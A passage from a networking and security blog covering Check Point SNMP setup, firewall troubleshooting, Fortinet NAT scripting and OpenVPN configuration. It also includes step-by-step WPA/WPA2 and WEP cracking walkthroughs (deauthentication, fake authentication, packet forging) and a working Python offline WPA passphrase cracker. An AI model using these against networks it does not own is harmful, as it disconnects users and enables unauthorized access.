# (answered by cpsnmpd on port 260) work. The community given with -c must be
# the :read community from $FWDIR/conf/snmp.C (configured below), otherwise the
# proxy gets no answer for 1.3.6.1.4.1.2620
proxy -v 1 -c D3adpack3tsR3AD localhost:260 .1.3.6.1.4.1.2620
# Define the monitoring servers that will receive the traps
vi /etc/snmp/snmpd.conf
syslocation	"Brazil, MA, DC Amazonas, Rack B22"
syscontact	"my_group_email@company.com"
trap2sink 192.0.2.10 D3adpack3tsR3AD

# Now configure the SNMP parameters of the application (the Check Point firewall)
# Change the values in parentheses as in the example
vi $FWDIR/conf/snmp.C
(
        : (
                : (system.sysName.0
                        :value (MY_FIREWALL_HOSTNAME)
                )
                : (system.sysDescr.0
                        :value ("Linux i386 vEL.3.0 Check Point FireWall-1")
                )
                : (system.sysContact.0
                        :value ("my_group_email@company.com")
                )
                : (system.sysLocation.0
                        :value ("Brazil, MA, DC Amazonas, Rack B22")
                )
                : (system.sysObjectID.0
                        :value (".1.3.6.1.4.1.2620.1.1")
                )
        )
        :snmp_community (
                :read (D3adpack3tsR3AD)
                :write ()
        )
)

# Enable the service
snmp service enable
# Tests
# Get the hostname from the OS SNMP agent
snmpwalk -c D3adpack3tsR3AD -v 2c localhost SNMPv2-MIB::sysName.0
# Test the Check Point SNMP sub-agent (through the proxy)
snmpwalk -c D3adpack3tsR3AD -v 2c localhost 1.3.6.1.4.1.2620
# If it does not work, kill the running cpsnmpd process and start it again
cpsnmpd -p 260
# Test remotely, from the Zabbix server
snmpwalk -c D3adpack3tsR3AD -v 2c YOUR_FIREWALL_REMOTE_IP SNMPv2-MIB::sysName.0
# If necessary, restart the service
service snmpd restart

From this point on the device can be added to any tool that collects information via SNMP, such as Nagios, SolarWinds or Zabbix. In the next article we will create the template and the host, associate them and create the most relevant screens.
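As an added check (my code, not from the original post), the script below parses the two files configured above, snmpd.conf and the Check Point snmp.C, and flags the mistakes this setup is prone to: the default public community left in place, a read community that accepts queries from any source (net-snmp's `rocommunity COMMUNITY [SOURCE]` takes an optional source host/network), a proxy line whose community differs from the `:read` community in snmp.C, a write community on either side, and traps sent with the default community. The configuration strings are constructed for the example; the "weak" one mirrors the Check Point SK example with `-c public` and no source restriction.

```python
import re
import shlex
from typing import Dict, List

CHECKPOINT_OID = "1.3.6.1.4.1.2620"

# Constructed samples (not copied from a live box).
SNMPD_CONF_WEAK = """\
rocommunity D3adpack3tsR3AD
proxy -v 1 -c public localhost:260 .1.3.6.1.4.1.2620
syslocation "Brazil, MA, DC Amazonas, Rack B22"
syscontact "my_group_email@company.com"
trap2sink 192.0.2.10 D3adpack3tsR3AD
"""

SNMPD_CONF_HARDENED = """\
# only the Zabbix server may poll, and the proxy uses the snmp.C read community
rocommunity D3adpack3tsR3AD 192.0.2.10
proxy -v 1 -c D3adpack3tsR3AD localhost:260 .1.3.6.1.4.1.2620
trap2sink 192.0.2.10 D3adpack3tsR3AD
"""

SNMP_C = """\
(
        : (
                : (system.sysName.0
                        :value (MY_FIREWALL_HOSTNAME)
                )
        )
        :snmp_community (
                :read (D3adpack3tsR3AD)
                :write ()
        )
)
"""


def parse_snmpd_conf(text: str) -> Dict[str, List[dict]]:
    """Extract the directives that matter for access control from a net-snmp snmpd.conf."""
    cfg: Dict[str, List[dict]] = {"rocommunity": [], "rwcommunity": [], "proxy": [], "trap2sink": []}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = shlex.split(line)
        key = parts[0]
        if key in ("rocommunity", "rwcommunity"):
            # rocommunity COMMUNITY [SOURCE [OID | -V VIEW]]
            cfg[key].append({"community": parts[1], "source": parts[2] if len(parts) > 2 else None})
        elif key == "proxy":
            # proxy [-Cn CONTEXT] [SNMPCMD_ARGS] HOST OID
            args = parts[1:]
            cfg["proxy"].append({
                "community": args[args.index("-c") + 1] if "-c" in args else None,
                "host": args[-2],
                "oid": args[-1].lstrip("."),
            })
        elif key == "trap2sink":
            # trap2sink HOST [COMMUNITY [PORT]]; the community defaults to public
            cfg["trap2sink"].append({"host": parts[1], "community": parts[2] if len(parts) > 2 else "public"})
    return cfg


def parse_snmp_c(text: str) -> Dict[str, str]:
    """Pull :read / :write out of the :snmp_community block of $FWDIR/conf/snmp.C."""
    block = re.search(r":snmp_community\s*\((.*?)\n\s*\)", text, re.S)
    if not block:
        return {"read": None, "write": None}
    found = dict(re.findall(r":(read|write)\s*\(([^)]*)\)", block.group(1)))
    return {"read": found.get("read", "").strip() or None,
            "write": found.get("write", "").strip() or None}


def audit(snmpd_conf: str, snmp_c: str) -> List[str]:
    findings = []
    cfg = parse_snmpd_conf(snmpd_conf)
    cp = parse_snmp_c(snmp_c)
    for c in cfg["rocommunity"] + cfg["rwcommunity"]:
        if c["community"] in ("public", "private"):
            findings.append("default community '%s' is still configured" % c["community"])
        if c["source"] is None:
            findings.append("community '%s' answers any source; restrict it to the poller" % c["community"])
    if cfg["rwcommunity"]:
        findings.append("rwcommunity present; SNMP write access on a firewall is rarely justified")
    for p in cfg["proxy"]:
        if p["oid"].startswith(CHECKPOINT_OID) and p["community"] != cp["read"]:
            findings.append("proxy community %r does not match snmp.C :read %r" % (p["community"], cp["read"]))
    if cp["read"] in (None, "public"):
        findings.append("snmp.C :read community is empty or the default")
    if cp["write"]:
        findings.append("snmp.C :write community is set")
    for t in cfg["trap2sink"]:
        if t["community"] == "public":
            findings.append("trap2sink %s sends traps with the default community" % t["host"])
    return findings


if __name__ == "__main__":
    for finding in audit(SNMPD_CONF_WEAK, SNMP_C):
        print("WEAK:", finding)
    print("hardened:", audit(SNMPD_CONF_HARDENED, SNMP_C) or "no findings")
```

Run it against the real files (`open("/etc/snmp/snmpd.conf").read()`, `open("/etc/snmp/snmpd.users.conf").read()` concatenated, and `$FWDIR/conf/snmp.C`) after each change; remember that SNMPv2c communities travel in cleartext, so restricting the source address is the only access control you have short of SNMPv3.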

References
How to enable SNMP on SecurePlatform
How to Configure SNMP on SecurePlatform
Machine with Check Point software responds with ‘No Such Object available on this agent at this OID’ to Check Point SNMP OID, but responds correctly to generic SNMP OID
Where to find Check Point MIB and SecurePlatform MIB information
SNMP on SPLAT – any HOWTO?
SNMP configuration in Checkpoint Secureplatform
Configuring system monitoring with SNMP for Check Point security gateways and security management

11/11/2012

Wireless Fun – Cracking WPA/WPA2

Filed under: segurança,wireless — drak @ 3:36 PM

Another post in the Wireless Fun series! This time we will see how to run a simple wordlist brute-force attack against a WPA or WPA2 network that uses pre-shared key authentication.

The goal of this post is to be a quick guide; if you do not understand what you are doing, I suggest reading the references.

This post was tested on the following system:

Linux kali 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali15 i686 GNU/Linux

Variables used

Interface = <INTERFACE>
Network = <REDE_ALVO>
BSSID = <00:AA:BB:CC:DD:FF>
CLIENT_MAC = <11:22:33:44:55:66>
Capture file = <FILENAME_CAPTURA>

Put the interface in monitor mode

airmon-ng start <INTERFACE>

Start airodump-ng to see what is nearby

airodump-ng mon0

Pick the target network and set the appropriate BSSID and channel filters in airodump

airodump-ng --bssid <00:AA:BB:CC:DD:FF> --channel 1 --write <FILENAME_CAPTURA> mon0

Wait until you see a message like "WPA handshake: 00:AA:BB:CC:DD:FF" on the first line of airodump-ng. If it does not appear and there are clients connected, you can force a client to re-authenticate (remember that this disconnects it; usually it reconnects on its own, and at that moment you capture the 4-way handshake):

aireplay-ng --deauth 1 -a <00:AA:BB:CC:DD:FF> -c <11:22:33:44:55:66> mon0

After that you should see the message "WPA handshake: 00:AA:BB:CC:DD:FF".

Once the 4-way handshake is captured we can start the offline brute-force of the PSK. For that you need a wordlist; we will use a standard wordlist that already ships with Kali, filtering only the passwords that are of interest:

cd /usr/share/wordlists/
gunzip rockyou.txt.gz
grep -E '^.{8,63}$' < rockyou.txt >> rockyou_wpa_passwd.txt
aircrack-ng -w rockyou_wpa_passwd.txt -b <00:AA:BB:CC:DD:FF> <FILENAME_CAPTURA>.cap

Wait and celebrate 🙂 (or not…)

The most critical point of this method is having a good wordlist; several are publicly available. Also remember that the PSK must be between 8 and 63 characters. To filter your wordlist by that criterion, here are two possible commands (one already used above):

awk '{ if ((length($0) > 7) && (length($0) < 64)){ print $0 }}' inputfile
grep -E '^.{8,63}$' < inputfile >> outputfile
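What aircrack-ng does with the captured handshake, as an added example (my code, not from the original post or from aircrack-ng): each candidate passphrase is stretched with PBKDF2-HMAC-SHA1 (4096 rounds, salted with the SSID) into the PMK; the PTK is derived from the PMK, both MAC addresses and both nonces; and the first 16 bytes of the PTK (the KCK) are used to recompute the MIC of EAPOL message 2. A match means the candidate is the PSK. The 8..63 character limit is a requirement of this derivation, which is why the wordlist is filtered first. Here the handshake is synthesized by `make_demo_handshake` from a known passphrase (a stand-in for parsing the .cap file), the MACs and nonces are made up, and only the WPA2 (HMAC-SHA1, key descriptor version 2) MIC variant is implemented; WPA/TKIP uses HMAC-MD5 instead.

```python
import hashlib
import hmac
from dataclasses import dataclass

PTK_LABEL = b"Pairwise key expansion"
MIC_OFFSET = 81   # byte offset of the 16-byte Key MIC field inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK -> PMK as in IEEE 802.11i: PBKDF2-HMAC-SHA1, 4096 rounds, 256 bits.
    The 8..63 character rule on the passphrase comes from this step."""
    pw = passphrase.encode()
    if not 8 <= len(pw) <= 63:
        raise ValueError("WPA passphrase must be 8..63 characters")
    return hashlib.pbkdf2_hmac("sha1", pw, ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512(PMK, label, min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, PTK_LABEL + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 MIC: HMAC-SHA1 over the EAPOL frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


@dataclass
class Handshake:
    ssid: str
    aa: bytes       # BSSID (authenticator)
    spa: bytes      # client MAC (supplicant)
    anonce: bytes
    snonce: bytes
    eapol: bytes    # EAPOL-Key message 2 as captured, MIC field included


def crack_psk(candidates, hs: Handshake):
    """Return the candidate whose derived KCK reproduces the captured MIC, or None."""
    captured_mic = hs.eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in candidates:
        cand = cand.rstrip("\r\n")
        if not 8 <= len(cand.encode()) <= 63:   # same filter as the grep above
            continue
        pmk = pmk_from_passphrase(cand, hs.ssid)
        kck = derive_ptk(pmk, hs.aa, hs.spa, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs.eapol), captured_mic):
            return cand
    return None


def make_demo_handshake(passphrase: str, ssid: str = "<REDE_ALVO>") -> Handshake:
    """Build a synthetic message 2 with a valid MIC for `passphrase` (stand-in for a real .cap).
    Addresses and nonces are made up."""
    aa = bytes.fromhex("00aabbccddff")
    spa = bytes.fromhex("112233445566")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    # EAPOL-Key layout: hdr(4) type(1) keyinfo(2) keylen(2) replay(8) nonce(32) iv(16) rsc(8) id(8) mic(16) datalen(2)
    frame = bytearray(99)
    frame[0:4] = b"\x02\x03\x00\x5f"   # 802.1X v2, type Key, body length 95
    frame[4] = 2                        # RSN key descriptor
    frame[5:7] = b"\x01\x0a"            # key info: MIC set, pairwise, descriptor version 2 (HMAC-SHA1)
    frame[17:49] = snonce
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    frame[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck, bytes(frame))
    return Handshake(ssid, aa, spa, anonce, snonce, bytes(frame))


if __name__ == "__main__":
    hs = make_demo_handshake("correcthorse")
    print(crack_psk(["short", "wrongpassword", "correcthorse"], hs))
```

The cost is the PBKDF2 step, 8192 HMAC-SHA1 calls per candidate, which is exactly why the wordlist quality matters more than raw speed; to crack a real capture, replace `make_demo_handshake` with code that extracts the SSID, both MACs, both nonces and message 2 from the .cap file.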

References
Tutorial: How to Crack WPA/WPA2
Tutorial: WPA Packet Capture Explained
aircrack-ng: How to crack WEP with no clients
aircrack-ng, seção “other tips”

09/10/2012

Wireless Fun – Cracking WEP

Filed under: segurança,wireless — drak @ 10:58 PM

Everyone knows it, everyone has done it, but since I never found a quick reference guide, below is what to do to crack a Wi-Fi network that uses WEP encryption (and if yours is still like that, change it now!)

The goal of this post is to be a quick guide; if you do not understand what you are doing, I suggest reading the references.

Variables used

Interface = <INTERFACE>
Network = <REDE_ALVO>
BSSID = <00:AA:BB:CC:DD:FF>
MAC OF YOUR WIRELESS CARD = <11:22:33:44:55:66>
Capture file = <FILENAME_CAPTURA>

Cracking WEP – common steps

Put the interface in monitor mode

airmon-ng start <INTERFACE>

Start airodump-ng to see what is nearby

airodump-ng mon0

Escolha a rede alvo e faça os filtros adequados pela criptografia, SSID e canal no airodump

airodump-ng --encrypt WEP --bssid <00:AA:BB:CC:DD:FF> --channel 1 --write <FILENAME_CAPTURA> mon0

Cracking WEP – With active clients on the network

Test that you can inject packets and use aireplay to generate traffic

# Injection test
aireplay-ng --test mon0
# Association with the AP
aireplay-ng --fakeauth 0 -a <00:AA:BB:CC:DD:FF> -e <REDE_ALVO> mon0
# Association using a MAC different from your wireless card's
aireplay-ng --fakeauth 0 -h <11:22:33:44:55:66> -a <00:AA:BB:CC:DD:FF> -e <REDE_ALVO> mon0
# Traffic generation; you must be associated first
aireplay-ng --arpreplay -b <00:AA:BB:CC:DD:FF> mon0

Start aircrack-ng to analyse the captured packets

aircrack-ng -e <REDE_ALVO> -b <00:AA:BB:CC:DD:FF> <FILENAME_CAPTURA>.cap

Cracking WEP – Without clients

# Associate
aireplay-ng --fakeauth 0 -a <00:AA:BB:CC:DD:FF> -e <REDE_ALVO> mon0

Obtain the PRGA using fragmentation or chopchop

aireplay-ng --fragment -b <00:AA:BB:CC:DD:FF> mon0
aireplay-ng --chopchop -b <00:AA:BB:CC:DD:FF> mon0

Generate an ARP request with the PRGA obtained earlier

packetforge-ng --arp -a <00:AA:BB:CC:DD:FF> -k 255.255.255.255 -l 255.255.255.255 -y fragment-dddd-nnnnnn.xor -h <11:22:33:44:55:66> -w fake_arp_request.cap

With the packet generated, replay it

aireplay-ng --interactive -r fake_arp_request.cap mon0

Or, instead of all of the above, simply:

aireplay-ng --interactive -p 0841 -c FF:FF:FF:FF:FF:FF -b <00:AA:BB:CC:DD:FF> mon0

Start aircrack-ng to analyse the captured packets

aircrack-ng -e <REDE_ALVO> -b <00:AA:BB:CC:DD:FF> <FILENAME_CAPTURA>.cap

Update 11/11: fixed the syntax of some commands

References
aircrack-ng: How to crack WEP with no clients

11/07/2012

TCP RST sent by the firewall

Filed under: cisco,troubleshooting — drak @ 7:00 PM

Case: a capture on a Cisco ASA (a big box, a 5550) showed intermittent communication for certain traffic: sometimes the connection was established, sometimes it received a TCP Reset. The appliance's performance metrics were checked first: CPU and memory were normal, and so was interface traffic.

The traffic was then examined end to end: it originated from a certain host on the internal network, reached the firewall and was sent on to a VIP (an F5 BIG-IP load balancer). A tcpdump was set up on the BIG-IP to determine which server in the farm was sending the TCP Reset, and to our surprise the BIG-IP capture showed no RST packets being sent at all.

Figure: traffic passing normally

Figure: traffic being rejected with a TCP RST

The question arose: why was the firewall sending the resets (since there were no other elements in the topology that could do so)?

The firewall was reviewed again: the ACL configuration, the existence of a service policy (there was none) and other security parameters that could limit connections, such as threat-detection, were checked; nothing relevant was found.

We were told that a new SAP-related application had gone into production recently, which could have had a performance impact on the firewall, but parameters like CPU and memory had already been analysed and were nowhere near 100%. It was when we looked at the number of established connections (sh conn count) that we noticed the number was strangely “round”: 650001. We immediately suspected that the appliance's maximum number of sessions had been reached, and checking the number of simultaneous sessions the appliance supports in the vendor's datasheet finally confirmed the suspicion: the behaviour we observed was happening precisely because that limit had been hit.

We reported the problem to the application team and ran a session analysis (insert link) to determine the most offensive IPs (in terms of number of sessions created) and passed that information on to them. During that analysis we noticed that most of the traffic came from backup servers doing DNS queries; we found that the backup machines were running the Data Protector software, whose default configuration performs a reverse DNS lookup of the IP of the server being backed up. The reason for the excessive number of sessions was that the reverse DNS zone was not configured, so Data Protector kept continuously retrying that DNS query, which was never resolved successfully, causing an effect similar to a DoS attack and exhausting the number of sessions in use on the firewall.
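As an added example (not from the original post), here is the kind of per-host session tally used in the analysis above, run over constructed "show conn"-style lines; the field layout (protocol, interface, ip:port, interface, ip:port, ...) is an assumption, so adjust the parsing to your platform's actual output.

```shell
# Added example, not from the original post: tally firewall sessions per host
# to find the most "offensive" sources, as done in the analysis above.
# The "show conn" line layout below is an assumed approximation of ASA output
# and the sample lines are constructed.

# Constructed sample: a backup server (10.10.5.21) holding several UDP/53
# sessions to the DNS server, plus two ordinary connections from other hosts.
SAMPLE_CONN='UDP outside 10.20.0.53:53 inside 10.10.5.21:40001, idle 0:00:01, bytes 120, flags -
UDP outside 10.20.0.53:53 inside 10.10.5.21:40002, idle 0:00:01, bytes 120, flags -
UDP outside 10.20.0.53:53 inside 10.10.5.21:40003, idle 0:00:02, bytes 120, flags -
TCP outside 10.20.0.80:443 inside 10.10.7.9:51234, idle 0:00:05, bytes 4096, flags UIO
TCP outside 10.20.0.80:443 inside 10.10.7.10:51235, idle 0:00:07, bytes 2048, flags UIO'

# top_sources [INTERFACE]: read conn lines on stdin and print "count ip", most
# sessions first, for the address that follows the given interface name
# (default: inside). The port is stripped before counting.
top_sources() {
    awk -v ifname="${1:-inside}" '
        {
            for (i = 1; i < NF; i++)
                if ($i == ifname) { split($(i + 1), a, ":"); n[a[1]]++ }
        }
        END { for (ip in n) printf "%d %s\n", n[ip], ip }
    ' | sort -rn
}

# top_destinations: the same tally for the outside side, which is how the
# DNS server shows up as the common destination of the backup servers' sessions.
top_destinations() {
    top_sources outside
}

# count_sessions: number of TCP/UDP conn lines on stdin. Compare it with the
# platform's datasheet limit; a suspiciously "round" value is the tell.
count_sessions() {
    grep -Ec '^(TCP|UDP) ' || true
}

# limit_reached COUNT LIMIT: succeed when the session count is at or above
# the limit (the post's 650001 against a 650,000-session datasheet figure).
limit_reached() {
    [ "$1" -ge "$2" ]
}
```

Feed `show conn` output through `top_sources` and `top_destinations` to get the offending hosts and what they are all talking to.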

References
Cisco ASA 5500 Series Adaptive Security Appliances

26/06/2012

Exporting variables at boot on Linux systems

Filed under: tips and tricks — drak @ 3:39 PM

In certain environments it is common to need some environment variables set during startup; as an example we will use export to configure a proxy:

export http_proxy=http://proxy.dominio.com:8080

To export variables when the system comes up, edit the following files.

/etc/rc.local (Red Hat based)
/etc/rc.conf (BSD based)

Settings that are loaded when the user logs in

/etc/profile (bash shell, for all users)
/home/usuario/.bash_profile (bash shell, only for that specific user; used for exporting variables)
/home/usuario/.bashrc (for running programs)

References
Running Additional Programs at Boot Time

21/06/2012

GWAPT Study Notes

Filed under: certification,security — drak @ 11:45 PM

Last year I took the GWAPT (GIAC Web Application Penetration Tester) certification, offered by SANS/GIAC. Below I share the study guide I put together while preparing for the certification; it is based on SANS's excellent course.

Recon

  • Whois, DNS (dig, nslookup, fierce)
  • Google hacking, newsgroups, mailing lists, social networks (gpscan, reconnoiter)
  • Maltego

Mapping

  • Port scan, service versioning (nmap)
  • Spidering (webscarab, paros, burp, wget, cewl)
  • Application flowchart (dirbuster)
  • Relationship Analysis (maltego)
  • Discover hidden pages (nikto)
  • Session Analysis (webscarab, burp)

Discovery

  • Automated scanner (grendel, w3af, burp)
  • Manual checks (info leak, dir browsing, username, command injection, sql injection, xss, csrf)
  • Client-side
    • AJAX (logic, api, data, sprajax, ratproxy)
    • Web Services (WSDL, UDDI, SOAP, ext. entity, xpath)
    • Flash (ratproxy, crossdomain, flare, swfscan, swfintruder)
    • Java (class, jad)
    • PHP

Exploitation

  • auth bypass
  • injection (sql, command, code, csrf, xss, response splitting)
    • sql (sqlmap, phpshell, ajaxshell, laudanum)
    • xss (post to get, evasion, durzosploit, attackAPI, beef)
    • limiting (client+java, client+pen, server+target, server+pen, pen infra)
  • session (hijack, fixation, xsrf, monkeyfist)

References
Certification:GWAPT
SANS

30/03/2012

Creating static NATs on Fortinet

Filed under: fortinet — drak @ 9:03 PM

The article below was contributed by my friend Ricardo “Dexter”.

Unlike most firewalls, when you create a NAT PUBLIC_IP -> REAL_INTERNAL_IP on a Fortinet it does not create the reverse association. That is, creating a NAT 200.200.200.200 -> 10.10.10.10 does not mean that when 10.10.10.10 goes out to the Internet it will be translated to 200.200.200.200; for that association to exist a NAT must be created in the Central NAT, a NAT table similar to Check Point's table for static NATs.

The script automates the configuration lines needed to create the NAT in both directions (VIP and Central NAT). As input, provide a table of public addresses each followed by its real address in the format below, and put it in a file called lista.txt in the same folder as the script.

200.200.200.200 10.10.10.10
200.200.200.201 10.10.10.11
200.200.200.202 10.10.10.12

Keep in mind that if there are already other NATs on the appliance you must change the value of the $ivc variable, since the Central NAT table associates NATs with IDs: the $ivc variable (id counter value) must be changed from 1 to the last ID in use.

#!/usr/bin/perl
use strict;
use warnings;

# Interface facing the Internet; change this variable
my $interfExt = "port16";

# Change the file name if needed; each line holds "NAT_IP REAL_IP"
my $listFile = "lista.txt";
open(my $list, '<', $listFile) or die "Cannot open $listFile: $!";

# Central NAT entries are keyed by numeric ID; if the box already has
# entries, set this to the last ID in use (see the note above)
my $ivc = 1;

while (my $line = <$list>) {
    chomp($line);
    next if $line =~ /^\s*$/;                    # skip blank lines
    my ($ipext, $ipint) = split(/\s+/, $line);
    die "Malformed line: '$line'\n" unless defined $ipint;

    # 1) VIP: public -> real (inbound direction)
    print "config firewall vip\n";
    print "    edit \"VIP_$ipext\"\n";
    print "        set extip \"$ipext\"\n";
    print "        set extintf \"$interfExt\"\n";
    print "        set mappedip $ipint\n";
    print "    next\n";
    print "end\n\n";

    # 2) Address object for the real host
    print "config firewall address\n";
    print "    edit \"$ipint\"\n";
    print "        set subnet $ipint 255.255.255.255\n";
    print "    next\n";
    print "end\n\n";

    # 3) IP pool containing only the public address
    print "config firewall ippool\n";
    print "    edit \"$ipext\"\n";
    print "        set endip $ipext\n";
    print "        set startip $ipext\n";
    print "    next\n";
    print "end\n\n";

    # 4) Central NAT: real -> public (outbound direction), keyed by ID
    print "config firewall central-nat\n";
    print "    edit $ivc\n";
    print "        set orig-addr \"$ipint\"\n";
    print "        set nat-ippool \"$ipext\"\n";
    print "        set orig-port 1\n";
    print "        set nat-port 1-65535\n";
    print "    next\n";
    print "end\n\n";

    $ivc++;
}
close($list);

30/11/2011

Configuring OpenVPN

Filed under: vpn — drak @ 10:25 PM

Below is a guide to installing OpenVPN to provide client-to-site VPN remote access; thanks to the voracious picanha eater who handed me this tutorial on a plate.

Install OpenVPN version 2.2.0 or higher, as it has better features and stability;
After installing, copy the folder /usr/share/doc/openvpn-2.2.0/easy-rsa/2.0 to /etc/openvpn/easy-rsa
Edit the fields in the file /etc/openvpn/easy-rsa/vars

export KEY_COUNTRY="BR"
export KEY_PROVINCE="SP"
export KEY_CITY="CIDADE"
export KEY_ORG="ORGANIZACAO"
export KEY_EMAIL="root@localhost"

In the folder /etc/openvpn/easy-rsa, run the commands:

source ./vars # Loads the vars file
./clean-all # Removes all existing keys
./pkitool --initca # Creates the CA
./pkitool --server server # Creates the server certificate
./build-dh # Creates the Diffie-Hellman parameters (dh1024.pem) copied below
cd keys
cp server.crt server.key ca.crt dh1024.pem ../../

To create the certificate for the clients, use the commands:

cd /etc/openvpn/easy-rsa
source ./vars
./build-key nome_do_usuario

Answer all the questions and set a password

Configure the file /etc/openvpn/server.conf; example below:

#################################################
# Sample OpenVPN 2.0 config file for            #
# multi-client server.                          #
#                                               #
# This file is for the server side              #
# of a many-clients <-> one-server              #
# OpenVPN configuration.                        #
#                                               #
# OpenVPN also supports                         #
# single-machine <-> single-machine             #
# configurations (See the Examples page         #
# on the web site for more info).               #
#                                               #
# This config should work on Windows            #
# or Linux/BSD systems.  Remember on            #
# Windows to quote pathnames and use            #
# double backslashes, e.g.:                     #
# "C:\\Program Files\\OpenVPN\\config\\foo.key" #
#                                               #
# Comments are preceded with '#' or ';'         #
#################################################

# Which local IP address should OpenVPN
# listen on? (optional)
;local a.b.c.d

# Which TCP/UDP port should OpenVPN listen on?
# If you want to run multiple OpenVPN instances
# on the same machine, use a different port
# number for each one.  You will need to
# open up this port on your firewall.
port 1194

# TCP or UDP server?
proto tcp
;proto udp

# "dev tun" will create a routed IP tunnel,
# "dev tap" will create an ethernet tunnel.
# Use "dev tap0" if you are ethernet bridging
# and have precreated a tap0 virtual interface
# and bridged it with your ethernet interface.
# If you want to control access policies
# over the VPN, you must create firewall
# rules for the the TUN/TAP interface.
# On non-Windows systems, you can give
# an explicit unit number, such as tun0.
# On Windows, use "dev-node" for this.
# On most systems, the VPN will not function
# unless you partially or fully disable
# the firewall for the TUN/TAP interface.
dev tap
;dev tun

# Windows needs the TAP-Win32 adapter name
# from the Network Connections panel if you
# have more than one.  On XP SP2 or higher,
# you may need to selectively disable the
# Windows firewall for the TAP adapter.
# Non-Windows systems usually don't need this.
;dev-node MyTap

# SSL/TLS root certificate (ca), certificate
# (cert), and private key (key).  Each client
# and the server must have their own cert and
# key file.  The server and all clients will
# use the same ca file.
#
# See the "easy-rsa" directory for a series
# of scripts for generating RSA certificates
# and private keys.  Remember to use
# a unique Common Name for the server
# and each of the client certificates.
#
# Any X509 key management system can be used.
# OpenVPN can also use a PKCS #12 formatted key file
# (see "pkcs12" directive in man page).
ca ca.crt
cert server.crt
key server.key  # This file should be kept secret

# Diffie hellman parameters.
# Generate your own with:
#   openssl dhparam -out dh1024.pem 1024
# Substitute 2048 for 1024 if you are using
# 2048 bit keys.
dh dh1024.pem

# Configure server mode and supply a VPN subnet
# for OpenVPN to draw client addresses from.
# The server will take 10.8.0.1 for itself,
# the rest will be made available to clients.
# Each client will be able to reach the server
# on 10.8.0.1. Comment this line out if you are
# ethernet bridging. See the man page for more info.
server 10.8.0.1 255.255.255.0

# Maintain a record of client <-> virtual IP address
# associations in this file.  If OpenVPN goes down or
# is restarted, reconnecting clients can be assigned
# the same virtual IP address from the pool that was
# previously assigned.
ifconfig-pool-persist ipp.txt

# Configure server mode for ethernet bridging.
# You must first use your OS's bridging capability
# to bridge the TAP interface with the ethernet
# NIC interface.  Then you must manually set the
# IP/netmask on the bridge interface, here we
# assume 10.8.0.4/255.255.255.0.  Finally we
# must set aside an IP range in this subnet
# (start=10.8.0.50 end=10.8.0.100) to allocate
# to connecting clients.  Leave this line commented
# out unless you are ethernet bridging.
;server-bridge 10.8.0.4 255.255.255.0 10.8.0.50 10.8.0.100

# Configure server mode for ethernet bridging
# using a DHCP-proxy, where clients talk
# to the OpenVPN server-side DHCP server
# to receive their IP address allocation
# and DNS server addresses.  You must first use
# your OS's bridging capability to bridge the TAP
# interface with the ethernet NIC interface.
# Note: this mode only works on clients (such as
# Windows), where the client-side TAP adapter is
# bound to a DHCP client.
;server-bridge

# Push routes to the client to allow it
# to reach other private subnets behind
# the server.  Remember that these
# private subnets will also need
# to know to route the OpenVPN client
# address pool (10.8.0.0/255.255.255.0)
# back to the OpenVPN server.
push "route 192.168.0.0 255.255.0.0"

# To assign specific IP addresses to specific
# clients or if a connecting client has a private
# subnet behind it that should also have VPN access,
# use the subdirectory "ccd" for client-specific
# configuration files (see man page for more info).

# EXAMPLE: Suppose the client
# having the certificate common name "Thelonious"
# also has a small subnet behind his connecting
# machine, such as 192.168.40.128/255.255.255.248.
# First, uncomment out these lines:
;client-config-dir ccd
;route 192.168.40.128 255.255.255.248
# Then create a file ccd/Thelonious with this line:
#   iroute 192.168.40.128 255.255.255.248
# This will allow Thelonious' private subnet to
# access the VPN.  This example will only work
# if you are routing, not bridging, i.e. you are
# using "dev tun" and "server" directives.

# EXAMPLE: Suppose you want to give
# Thelonious a fixed VPN IP address of 10.9.0.1.
# First uncomment out these lines:
;client-config-dir ccd
;route 10.9.0.0 255.255.255.252
# Then add this line to ccd/Thelonious:
#   ifconfig-push 10.9.0.1 10.9.0.2

# Suppose that you want to enable different
# firewall access policies for different groups
# of clients.  There are two methods:
# (1) Run multiple OpenVPN daemons, one for each
#     group, and firewall the TUN/TAP interface
#     for each group/daemon appropriately.
# (2) (Advanced) Create a script to dynamically
#     modify the firewall in response to access
#     from different clients.  See man
#     page for more info on learn-address script.
;learn-address ./script

# If enabled, this directive will configure
# all clients to redirect their default
# network gateway through the VPN, causing
# all IP traffic such as web browsing and
# and DNS lookups to go through the VPN
# (The OpenVPN server machine may need to NAT
# or bridge the TUN/TAP interface to the internet
# in order for this to work properly).
;push "redirect-gateway def1 bypass-dhcp"

# Certain Windows-specific network settings
# can be pushed to clients, such as DNS
# or WINS server addresses.  CAVEAT:
# http://openvpn.net/faq.html#dhcpcaveats
# The addresses below refer to the public
# DNS servers provided by opendns.com.
;push "dhcp-option DNS 208.67.222.222"
;push "dhcp-option DNS 208.67.220.220"

# Uncomment this directive to allow different
# clients to be able to "see" each other.
# By default, clients will only see the server.
# To force clients to only see the server, you
# will also need to appropriately firewall the
# server's TUN/TAP interface.
;client-to-client

# Uncomment this directive if multiple clients
# might connect with the same certificate/key
# files or common names.  This is recommended
# only for testing purposes.  For production use,
# each client should have its own certificate/key
# pair.
#
